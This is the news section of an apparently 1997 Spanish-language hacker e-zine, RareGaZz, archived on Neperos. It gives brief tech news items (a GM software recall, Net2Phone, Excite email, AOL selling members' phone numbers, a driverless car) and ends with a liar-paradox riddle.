cuando Fujimori termine en Irlanda llegara otro dictador mas pendejo y las
cosas seguiran igual . . . :)

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

DETROIT - General Motors anuncio que empezara a sacar del publico 292,860
pontiacs, oldsmobiles y buicks de los modelos 1996 y 1997 por un error en
el software de la maquina que puede resultar en fuego.

Los carros son los pontiac bonneville 1996, oldsmobile noventa y ocho,
ochenta y ocho, buick park avenue, lesabre, riviera, regal, y algunos buick
le sabres 1997.

General Motors dijo que un error en la secuencia en el sistema del motor
puede ocasionar un fuego durante el arranque.

Con la proliferacion de la tecnologia de computadoras en los automoviles,
tenia que pasar algun dia...

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Tenia que pasar tarde o temprano. IDT Corp esta instalando ya su nuevo
producto Net2Phone Direct, un servicio telefonico de Internet que puedes
usar desde cualquier telefono (Nueva York Inicialmente). Tu marcas a un
servidor de red que contacta a otro servidor para completar la llamada. Las
tarifas son espectacularmente bajas: 8 centavos de dolar el minuto nacional,
18 centavos internacional.
De ahora en adelante ya saben a quienes culpar cuando el trafico en internet
sea pesado :)

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El primer Torneo de QUAKE para mujeres esta en estos momentos...
http://www.slamsite.com/aft/

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Excite (www.excite.com) sera la primera maquina de busqueda en ofrecer un
servicio gratuito de email. Estaremos checando ese servicio...

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Un operador de Geocities removio una pagina aparentemente puesta por jovenes
que contenia las calificaciones de looks y personalidad de unas 152 chicas
de octavo grado en alguna escuela de Palo Alto CA. La calificacion mas alta
del look de una chica fue 9 y el mas bajo en personalidad 1/7.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

La caja TVMessenger de $99 disponible en internet, se conecta al telefono y
a la television para mostrar en pantalla el Caller ID de cualquier persona
que llame. Tambien muestra llamadas en espera y mas...

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El operador de satelites Arabsat dice que no reconsiderara su censura total
en el canal Telecom de Francia despues de que la estacion francesa transmitio
una pelicula porno a todo el mundo arabe el sabado haciendo enojar a los
seguidores del Islam. Un error tecnico (y no un hacker) fue culpado.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

IBM anuncio dos computadoras de red (network computers) a tan solo $799
US.dlls cada una.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El 31 de Julio American Online empezara a vender los numeros telefonicos de
sus miembros a compa¤ias de telemarketers.
[ que mas puede esperarse de AOL?? ]

(+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+)

En Los Angeles California un revolucionario invento ha sido creado que
permite a un auto manejar por las autopistas de esa ciudad sin necesidad
de chofer.

(+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+)

El jueves 31 de julio (1997) Dave Foley de NBC radio news iniciara una sesion
de chat con su publico a las 9:00pm hora de Los Angeles en chat.yahoo.com

Tal vez nosotros hagamos algo parecido proximamente...

(+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+)

"El uso de esta seccion sin autorizacion firmada electronicamente con la
llave pgp de la revista RareGaZz esta estrictamente prohibido."


(+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+)

Nosotros tenemos las noticias interesantes...los demas NO!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-=[NotiLOONS]=-
+Groovy+
+ServerHacker+

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
**FIN**FIN**FIN**FIN**FIN**FIN**FIN**FIN*FIN**FIN**FIN**FIN**FIN**FIN**FIN**
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

Un bocado mental...

- Existe un puente donde para pasar es necesario decir una frase verdadera
a el jurado mas justo del mundo. Si la frase es verdadera pasaras por el
puente, si la frase es mentira mueres ahorcado.
Se sabe de una persona que dijo la frase: `morire ahorcado'.
Si el jurado lo ahorcaba la frase era verdadera y entonces debia pasar,
pero si lo dejaban pasar la frase seria mentira y entonces debia morir.
Para solucionar el conflicto su novia corrio con el juez supremo a 10
millas de distancia y este le escribio un recado que debia llevar a el
jurado. La novia llego y el jurado leyo el mensaje:
" El hombre podra pasar unicamente si la frase que aparece al
reverso del papel es verdadera. "

El jurado confundido leyo el reverso del papel y decia:
" Lo que dice el otro lado del papel es falso. "

RareGaZz se despide de ustedes preguntandoles... ¨ morira esta persona ?

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT